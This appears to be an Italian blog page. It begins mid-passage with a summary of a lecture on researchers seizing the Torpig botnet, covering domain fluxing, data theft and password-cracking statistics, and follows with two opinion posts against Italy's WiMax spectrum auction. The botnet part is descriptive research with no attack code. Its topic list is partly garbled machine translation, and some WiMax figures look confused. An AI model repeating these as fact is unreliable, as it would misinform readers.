Successivamente, i cattivi notato che una parte della botnet è stata sottratta, rilasciano un aggiornamento software per tutti i bot che utilizzeranno un nuovo algoritmo di flusso di dominio, questi nuovi algoritmi usano gli argomenti popolari del giorno sul social network Twitter e li utilizzano per generare i nomi di dominio.Con questo nuovo algoritmo i ricercatori non erano più in grado di prevedere il dominio che sarebbe stato utilizzato il giorno successivo, bisognerebbe conoscere un giorno prima l’argomento più polare su un social network che riporta per l’80% notizie in tempo reale.

Quando i bot comunicano con il server di comando trasmettono un campo ID univoco che è stato generato dall’hardware della macchina. Questo ha permesso ai ricercatori di stimare il numero reale di computer infetti. I ricercatori hanno visto 1,2 milioni di indirizzi IP unici, ma soltanto 180.000 macchine. I bot analizzati rubavano i dati finanziari da 410 istituti finanziari (top 5: PayPal, Poste Italiane, Capital One, E * Trade, Chase), avrebbero un registro di carte di credito (prime 5 carte: Visa, Mastercard, American Express, Maestro, Discover ), e avrebbero anche rubato tutte le password dal gestore delle password dei browser.

In uno studio del 2008 Symantec ha stimato che le informazioni riguardanti le carte di credito sono vendute da 10 a 25 dollari per ogni carta nel mercato nero. Le informazioni dei conti bancari sono vendute da 10.00 a 1,000 dollari per ogni conto. L’utilizzo di questo studio ha permesso ai ricercatori di stimare, durante il periodo di 10 giorni, l’importo delle risorse finanziarie che i bots hanno raccolto sono state del valore di 83.000 a 8,3 milioni di dollari. Utilizzando varie stime dei ricercatori si è calcolato che i bot sono usati per il denial of service e la larghezza di banda totale sarebbe 17Gbps.

Dal momento che è stato Torpig a inviare tutti i dati HTTP POST e-mail al server di comando e controllo, i ricercatori hanno statistiche sulle e-mail e hanno scoperto che il 14% di tutte le email sono state lette sui posti di lavoro, il 10% ha parlava di sicurezza del computer / malware, 7% di denaro, 6% erano appassionati di sport, il 5% erano preoccupati per gli esami e la loro qualità, il 4% parlavano della ricerca di partner online. Il 28% delle persone riutilizzato la propria password su più domini. Ci sono state 173.686 password univoche.

I ricercatori hanno convertito le password in formato Unix e hanno cercato di forzarle con John the Ripper. 56.000 erano crackate in meno di 65 minuti con attacco di forza bruta, invece utilizzando un dizionario 14.000 password son bastati 10 minuti. E altri 30.000 sono state le password crackate nelle 24 ore successive. Il 58% di tutte le password sono state crackate in 24 ore.

Il video conferenza è lungo 1h 15m ed è presentato da Richard A. Kemmerer.

Rubare una botnet

Qui ci sono tutti gli argomenti della conferenza:

• [02:00] terminologia botnet – bot, botnet, server di comando e controllo, canale di controllo, botmaster.
• [03:00] Introduzione al trojan Torpig e la piattaforma Mebroot malware.
• [05:00] Come Torpig opere.
• [11:30] Torpig iniezione HTML.
• [15:00] fluxing dominio.
• [19:15] Capofila c Torpig’s & C server.
• [24:10] principi di raccolta dei dati.
• [26:00] C & C protocollo del server.
• [31:10] stima botnet di dimensioni.
• [37:00] minacce “botnet” è: il furto di informazioni finanziarie, denial of service, server proxy, furti privacy.
• [37:30] Minaccia: furto di informazioni finanziarie.
• [42:00] Threat: Denial of Service.
• [43:30] minacce: i server proxy.
• [44:20] Minaccia: furto Privacy.
• [47:00] Analisi Password.
• [50:40] punizione penale.
• [53:00] applicazione della legge.
• [58:00] Rimpatrio dei dati.
• [01:00:00] Etica.
• [01:02:00] Conclusioni.
• [01:06:00] Domande e risposte.

L’asta per asegnare le frequenze del WiMax è finita, si sono assegnate le frequenze e le aree di utilizzo, quindi il WiMax potrà partire e portare benefici per tutti! Dovrebbero essere tutti felici e contenti, nessuna contestazione, nessun muso lungo, ma purtroppo non è così. Perché questo? forse perché non si è mai contenti? per il gusto di contestare? oppure c’è qualcosa che non và… In questo articolo cercherò di affrontare il problema e andare a vedere perché alcuni si ostinano a contestare anche quando sembrerebbe tutto risolto.

La situazione italiana.

Le licenze per l’utilizzo delle frequenze sono state assegnate. I costi sono esorbitanti, in totale 136.337.000 di euro, un valore molto superiore a quello registrato negli altri paesi europei, + 176% sulla base d’asta. Molti temono, specialmente le associazioni consumatori che le spese folli per le licenze portino ad un costo elevatissimo del servizio come è già successo per l’UMTS, cioè che il servizio diventi costoso a fronte del proposito di superare il problema del digital divide italiano.

Una competizione vivace, che secondo il ministro delle TLC Paolo Gentiloni è “testimonianza sia dell’interesse per questa nuova tecnologia di banda larga senza fili, sia dell’impegno che le imprese vincitrici vorranno sostenere per far partire in Italia i servizi WiMax”. (si poteva fare benissimo statale, come avrebbero voluto molte regioni, provincie e comuni, ndr).

Le frequenze assegnate, su cui si dovrà costruire le reti WiMax, sono da 3,4 a 3,6 GHz. Sono proprio queste bande di frequenze che generano molte discussioni e malcontenti.

La questione delle frequenze

Per costruire una rete senza fili le frequenze che si scelgono per trasmettere i dati sono vitali. Detto semplicemente: più alta è la frequenza meno lontano andrà il segnale. In termini pratici: a 900 MHz (0,9 GHz) si riesce ad arrivare fino a 25 Km (in aree extraurbane) con i 1800 MHz (1,8 GHz, il famoso dualband) bisogna scendere a 6 Km. All’avvento dell’UMTS, HSDPA e simili si è scelta come frequenza i 2,1 GHz, questo ha fatto si che delle tecnologie molto superiori al GSM hanno delle prestazioni pessime sulla distanza e decenti vicino alla cella. All’epoca del lancio dell’UMTS le compagnie per migliorare le prestazioni furono costrette ad avvicinare ed aumentare il numero di celle, di consegueza aumentarono i costi. Per un approfondimento su questo tema è utile leggere questo articolo. Visto cosa è successo con l’UMTS, l’HSDPA, ecc, non è servito d’esperienza, per il WiMax si è scelto comunque di utilizzare le frequenze molto alte che vanno da 3,4 a 3,6 GHz.

Questo modo di procedere, dalla scelta delle frequenze alla messa all’asta delle frequenze, fa diventare il WiMax da molto economico e affidabile a molto costoso e poco perfomante. Chi costruirà le reti dovrà prima di tutto costruire altre celle (ripetitori e antenne per intenderdi) molto più vicine rispetto a quelle già presenti (quindi con tutte le problematiche del caso, vedasi tutti i permessi e resistenze dei cittadini a mettere nuove antenne vicino alle case) che faranno lievitare i costi. Secondo, le compagnie dovranno rientrare dei costi delle licenze, sempre se non venderanno a pezzetti le aree ad altre compagnie (è previsto dal bando di gara, se chi si aggiudica la gara non utilizzerà le frequenze dovrà rivendere a chi ne faccia richiesta) che faranno lievitare i costi.

Sul problema delle frequenze è utile leggere questo articolo (vicenda) e questo articolo (per sapere come è andata a finire), la vicenda poteva servire da esperienza per l’Italia, ma non è stato così.

In altri paesi che si fa? Funziona?

Alcuni paesi hanno più saggiamente scelto (a partire dall’UMTS, l’HSDPA, ecc.), frequenze molto più lunghe (basse). Queste scelte hanno portato dei vantaggi notevoli, in alcuni casi a prestazioni superiori alle aspettative come in Giappone.

Negli USA si vorrebbe costruire una rete WiMax nazionale e coprire tutto il territorio degli Stati Uniti. Per questo ci sono stati degli investimenti di circa 2,7 miliardi di dollari (1,7 miliardi di euro) si pensa che si riuscirà a costruire la rete entro 12-24 mesi. Ma la cosa più importante è la frequenza che si adotterà: saranno i 700 MHz (0,7 GHz). Per approfondire leggere questo articolo.

In Giappone, molto più avanzati, l’azienda NTT DoCoMo dal 2006 si sta attrezzando (terminerà nel 2009) ad incrementare le velocità dell’HSDPA e dell’HSUPA fino a 300 Mbit in download e 75 Mbit in upload, questa azienda utilizza come frequenza i 20 MHz (0,02 GHz), approfondimento su questo articolo.

Conclusioni

Trarre delle conclusioni è facile.

L’utilità e l’economicità di una tecnologia dipende da chi decide e amministra.

Ciao, Arturu.it

Oggi si parla di reti senza fili: Wi-Max (tecnologia esistente dal 2002). Questa tecnologia potrebbe rivoluzionare il modo di comunicare ma sta diventanto (come al solito) la gallina d’oro per i soliti operatori delle telecomunicazioni. Questa è in parole povere l’evoluzione delle reti wireless (Wi-fi). In più, è una tecnologia che con un costo irrisorio (intorno ai 1000 euro ogni 7850 km²) permette di collegare ad internet qualsiasi persona munita di computer, PDA, Smartphone e cellulare con velocità a partire da 1 Mbit/s fino a 70 Mbit/s. In questo articolo cercherò, nel limite delle mie capacità mentali, di affrontare questo problema controverso…

WiMAX è una tecnologia di trasmissione senza fili d’accesso a banda larga, in grado di fornire elevate prestazioni, in termini di velocità di trasmissione di dati, a basso costo. La possibilità di essere utilizzato su qualsiasi tipo di territorio, a prescindere dalle caratteristiche geografiche (si possono utilizzare sistemi WiMAX, in tutti gli ambienti, dall’urbano al rurale), rende WiMAX competitivo sul mercato per ogni tipo di utenza (dall’azienda all’utente singolo). WiMAX è in grado di operare sia su bande di frequenza sottoposte a licenza (cioè porzioni dello spettro frequenziale assegnate in uso esclusivo dalle istituzioni governative preposte a enti e aziende, solitamente dietro compenso) che su bande “non licenziate” (cioè su frequenze per il cui utilizzo non vi è alcun pagamento). La tecnologia supporta velocità di trasmissione di dati condivisi fino a 70 Mbit/s in aree metropolitane, utilizzando una tecnologia che non richiede la visibilità ottica tra le stazioni. Secondo i proponenti di WiMAX questa ampiezza di banda è sufficiente per supportare simultaneamente almeno 40 aziende con connettività di tipo T1 e 70 abitazioni con connettività al livello DSL da 1 Mbit/s. (Definizione tratta da Wikipedia, per approfondire clicca qui).

2. In Italia che succede…?

Per rendere operativa una rete WiMAX sono essenziali le frequenze radio su cui far transitare il segnale. In Italia fino a qualche tempo fà, queste frequenze, erano utilizzate dal Ministero della Difesa. Di recente, il Ministero, ha migrato le comunicazioni su altre frequenze con la seguente motivazione: un contributo all’eliminazione del DIGITAL-DIVIDE nel Bel Paese, la creazione di un’alternativa al terrestre per quanto riguarda la connettività, la risoluzione della copertura dell’ultimo miglio, ecc., ecc. … bla, bla, bla … e paroloni vari…

2.1 Potenzialità…

Wooow!!! Bellissima iniziativa!!! Dunque ogni comune con 1000 euro (100 più, 100 meno) ogni 50 km può installare una bella antenna e condividere la connessione, così facendo si riuscirebbe a coprire l’intero territorio italiano con una bella rete pubblica. I vantaggi potrebbero essere molteplici: connessione per tutti i computer della nazione, connessione di tutti i dispositivi mobili. Con un solo investimento (quasi irrisorio) si riducono di circa il 90% il costo delle connessioni ad internet e si azzerano i costi delle telefonate sia per la Pubblica Amministrazione che per i cittadini. Per chi non fosse a conoscenza: su qualsiasi computer connesso ad internet si possono usare i programmi di VoIP (il più famoso è Skype) per far transitare attraverso internet le telefonate, la stessa cosa si può fare con un portatile, PDA e Smartphone; ultimamente esistono alcuni cellulari (io conosco quello della Nokia di qualche anno fa, intanto ne sono nati altri) che possono aggangiarsi alle reti wireless e con skype installato si può chiamare gratis un altro dispositivo connesso ad internet (in tutto il globo). C’è una nazione vicino a noi che è riuscita a realizzare tutto questo: la macedonia (per approfondimenti cliccare qui e qui).

2.2 Dalla fantasia alla realtà…

Ritorniamo in Italia, ops, alla realtà…

In Italia si è deciso di dividere in territorio in grandi maxi-aree e mettere all’asta le relative frequenze a cui si può partecipare soltando avendo dei requisiti particolari (bando). Tutto questo procedere sembra in netto contrasto con quanto, anche a livello Comunitario, sia stato sempre espresso come diritto d’accesso alla tecnologia da parte dei cittadini, ispiratore di varie direttive EU in ambito ICT a far capo dalla nota direttiva quadro del Parlamento Europeo e del Consiglio, n. 2002/21/CE del 7 marzo 2002, che “istituisce un quadro normativo comune per le reti ed i servizi di comunicazione elettronica” (leggi) e ribadito nei vari titoli del capitolo “Società dell’Informazione”, (leggi).

Su questa decisione hanno protestato in molti, comprese alcune provincie e comuni (come quello di genova):

Il punto è che questa promettente tecnologia banda larga senza fili è stata attesa per due anni, da vari soggetti, pubblici e privati; e ora che finalmente sta per essere lanciata si scontra con le aspettative di molti. Ognuno aveva fatto piani per utilizzarla ai propri scopi. “Noi avremmo voluto usare il WiMax per creare una rete cittadina a Genova, con servizi pubblici innovativi”, spiega a Repubblica.it Francesco Bollorino, consulente del Comune di Genova per il progetto Città Digitale. Il problema? “Per realizzare il nostro sogno saremmo costretti a concorrere con gli operatori, nell’asta prevista dal bando, per ottenere una licenza WiMax”, spiega Bollorino. “E con le risorse finanziarie di una pubblica amministrazione è cosa molto improbabile riuscire nell’intento. Tra l’altro non c’è nemmeno una licenza che vada bene per noi. Le licenze all’asta sono regionali o riguardano più regioni accorpate. Non ce ne sono per singole province”.

Queste licenze fanno talmente gola che anche aziende come la rai e mediaset si accapigliano, visti i costi/profitti… Un elenco dei concorrenti si può trovare qui in pdf.

2.3 Perchè le aste per il WiMAX sono la scelta peggiore per il cittadino…?

Questa situazione si era presentata con la tecnologia UMTS. Tutti sappiamo come è andata a finire: una tecnologia di gran lunga superiore al GPRS e più economica; ma quante sono le persone che la sfruttano? magari solo per videotelefonare…

Nonostante il fatto che le aste siano una idea palesemente sbagliata, è stata intrapresa ugualmente questa strada per assegnare le frequenze del Wi-MAX. Il motivo è ovvio: se si liberalizzasse l’accesso alle frequenze del Wi-MAX, chiunque, con pochi soldi, potrebbe fare concorrenza alle grandi aziende che operano nel settore della telefonia e che usano lo standard UMTS. Queste aziende hanno pagato decine di milioni di euro per avere quelle frequenze e non vogliono certo vedersi rubare il mercato dai primi arrivati. A questo punto, è chiaro che gli interessi di queste aziende sono palesemente in contrasto con gli interessi della comunità e dei consumatori.

Tutte le aziende vincitrici non avranno nessun interesse ad introdurre subito nel mercato la nuova tecnologia, prima dovranno sfruttare l’UMTS e l’HSPA, poi introdurranno piano piano il WiMAX a caro prezzo (dopo averlo blindato logicamente).

Nessuno potrà ccostruirsi la propria rete senza fili WiMAX, come oggi succede per il wi-fi, in quanto trasmettere su quelle frequenze sarà un reato.

Nel caso particolare del WI-MAX, non stiamo parlando di tecnologie il cui costo in termini di infrastruttura sia molto elevato o riconducibile ad altre tipologie di servizi mobili anche di ultima generazione, ma di una SOLUZIONE DI INTERNETWORKING BEN DIFFERENTE, in grado di coprire molti aspetti e molti usi rispetto alle attuali soluzioni di connettività e servizi mobili e fissi ed il cui costo in configurazione ad uso personale rientra nei parametri di un investimento “casalingo” (poche centinaia di Euro), nonchè in quelli poco più elevati di un’attività amatoriale – quale potrebbe essere quella di un’associazione radioamatoriale – per un’installazione in grado di servire alcune decine di utenti.
Non sembra quindi giustificato un approccio anteponente il permesso dello sfruttamento commerciale a vantaggio degli operatori del settore – con conseguente chiusura dello spettro radio interessato – all’uso privato SENZA SCOPO DI LUCRO a favore dei singoli cittadini italiani ed europei delle medesime frequenze e tecnologie.
In tal modo si verificherebbe di fatto una DISCRIMINAZIONE di TECNOLOGIA ai danni dei cittadini e consumatori, poichè diverrebbe di fatto impossibile o molto difficile utilizzare il WI-MAX in regime libero a fronte di un’assegnazione dell’intero spettro frequenze (o della maggior parte di esso), a fini commerciali; verrebbe cancellata quindi la possibilità per chiunque di utilizzare in maniera AUTONOMA e LIBERA le apparecchiature STANDARD atte a realizzare le reti in questione, il cui commercio e diffusione sono invece mondialmente permessi (e riconosciuti anche in territorio Europeo). Una tale DISCRIMINAZIONE TECNOLOGICA sarebbe in contrasto con i principi cardine contenuti nell’emanazioni Comunitarie del settore “Società dell’informazione” sopracitata, cap. Verso un nuovo quadro per l’infrastruttura delle comunicazioni elettroniche, oltreché ben poco libertaria e democratica.

3. Conclusioni…

Per concludere, come al solito non ci si capisce niente… Tutto ingarbugliato, quando in altri stati è stato semplice senza bandi e senza giochini politici. Comunque mi frullano in testa alcune domande:

Ciao Saluti…

Ps. Chiunque voglia firmare la petizione si trova qui.